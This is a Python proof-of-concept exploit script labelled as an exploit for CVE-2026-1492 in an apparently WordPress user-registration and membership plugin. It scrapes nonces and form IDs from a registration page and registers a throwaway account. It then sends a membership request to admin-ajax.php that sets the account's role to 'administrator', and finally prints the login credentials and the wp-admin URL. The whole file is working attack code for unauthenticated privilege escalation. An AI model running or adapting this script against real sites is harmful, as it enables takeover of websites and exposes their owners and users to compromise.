import requests import re import random import argparse import textwrap import json from bs4 import BeautifulSoup # ========================= # COLORS # ========================= GREEN = "\033[92m" RED = "\033[91m" YELLOW = "\033[93m" RESET = "\033[0m" def info(msg): print(f"{YELLOW}[*]{RESET} {msg}") def success(msg): print(f"{GREEN}[+]{RESET} {msg}") def error(msg): print(f"{RED}[-]{RESET} {msg}") # ========================= # GENERATION USER # ========================= USERNAME = "user" + str(random.randint(1000, 9999)) EMAIL = USERNAME + "@gmail.com" PASSWORD = "pass" form_data = [ {"field_name": "user_login", "value": USERNAME, "field_type": "text", "label": "Username"}, {"field_name": "user_email", "value": EMAIL, "field_type": "email", "label": "User Email"}, {"field_name": "user_pass", "value": PASSWORD, "field_type": "password", "label": "User Password"}, {"field_name": "user_confirm_password", "value": PASSWORD, "field_type": "password", "label": "Confirm Password"} ] # ========================= # EXTRACTION TOKENS + MEMBERSHIP # ========================= def extract_all(session, url): r = session.get(url) html = r.text soup = BeautifulSoup(html, "html.parser") form_id = None frontend_nonce = None security = None wpnonce = None membership_id = None for inp in soup.find_all("input"): name = inp.get("name") value = inp.get("value") if value: if name == "ur-user-form-id": form_id = value if name == "ur_frontend_form_nonce": frontend_nonce = value if inp.get("type") == "radio" and inp.get("name") == "urm_membership": membership_id = value js_content = "" for script in soup.find_all("script"): content = script.string or script.get_text() if not content: continue if "user_registration_params" in content: js_content += content if "ur_membership_frontend_localized_data" in content: js_content += content match = re.search(r'var user_registration_params = (\{.*?\});', js_content, re.DOTALL) if match: data = json.loads(match.group(1)) security = data.get("user_registration_form_data_save") match = re.search(r'var ur_membership_frontend_localized_data = (\{.*?\});', js_content, re.DOTALL) if match: data = json.loads(match.group(1)) wpnonce = data.get("_nonce") return form_id, frontend_nonce, security, wpnonce, membership_id # ========================= # MAIN # ========================= if __name__ == '__main__': parser = argparse.ArgumentParser( description='CVE-2026-1492 Exploit', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=textwrap.dedent('''Example: python3 poc.py -t http://localhost:5000 -ru http://localhost:5000/?page_id=6 ''') ) parser.add_argument('-t', '--target', required=True) parser.add_argument('-ru', '--registration-url', required=True) parser.add_argument('--debug', action='store_true', help='Show raw requests') args = parser.parse_args() session = requests.Session() headers = { "Accept": "*/*", "Accept-Language": "en-US,en;q=0.9", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": args.target, "Referer": args.registration_url, "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36", "X-Requested-With": "XMLHttpRequest" } # ========================= # EXTRACTION # ========================= info("Extracting tokens...") form_id, frontend_nonce, security, wpnonce, membership_id = extract_all(session, args.registration_url) success(f"form_id: {form_id}") success(f"frontend_nonce: {frontend_nonce}") success(f"security: {security}") success(f"wpnonce: {wpnonce}") success(f"membership_id: {membership_id}") # ========================= # REGISTER # ========================= info("Sending registration request...") ajax_url = args.target + "/wp-admin/admin-ajax.php" payload1 = { "action": "user_registration_user_form_submit", "security": security, "form_data": json.dumps(form_data), "form_id": form_id, "registration_language": "en-US", "ur_frontend_form_nonce": frontend_nonce } r1 = session.post(ajax_url, headers=headers, data=payload1) try: r1_json = r1.json() if r1_json.get("success"): success(f"User created: {USERNAME}") else: error("Registration failed") except: error("Invalid response (not JSON)") # ========================= # MEMBERSHIP / EXPLOIT # ========================= info("Sending membership request...") members_data = { "role": "administrator", "membership": membership_id, "payment_method": "free", "start_date": "2026-3-20", "switched_currency": "\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t", "urm_zone_id": "\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t", "username": USERNAME } form_response = { "username": USERNAME, "success_message_positon": 1, "redirect_timeout": 0, "form_login_option": "default", "registration_type": "membership" } payload2 = { "action": "user_registration_membership_register_member", "members_data": json.dumps(members_data), "form_response": json.dumps(form_response), "_wpnonce": wpnonce } r2 = session.post(ajax_url, headers=headers, data=payload2) try: r2_json = r2.json() if r2_json.get("success"): success("Membership applied → possible privilege escalation\n") info(f"Try logging in with:") print(f" Username: {USERNAME}") print(f" Password: {PASSWORD}\n") info(f"Then access:") print(f" {args.target}/wp-admin/") else: error("Membership failed") except: error("Invalid response (not JSON)") # ========================= # DEBUG # ========================= if args.debug: print("\n[DEBUG] Request body:") print(r2.request.body) print("\n[DEBUG] Response:") print(r2.text)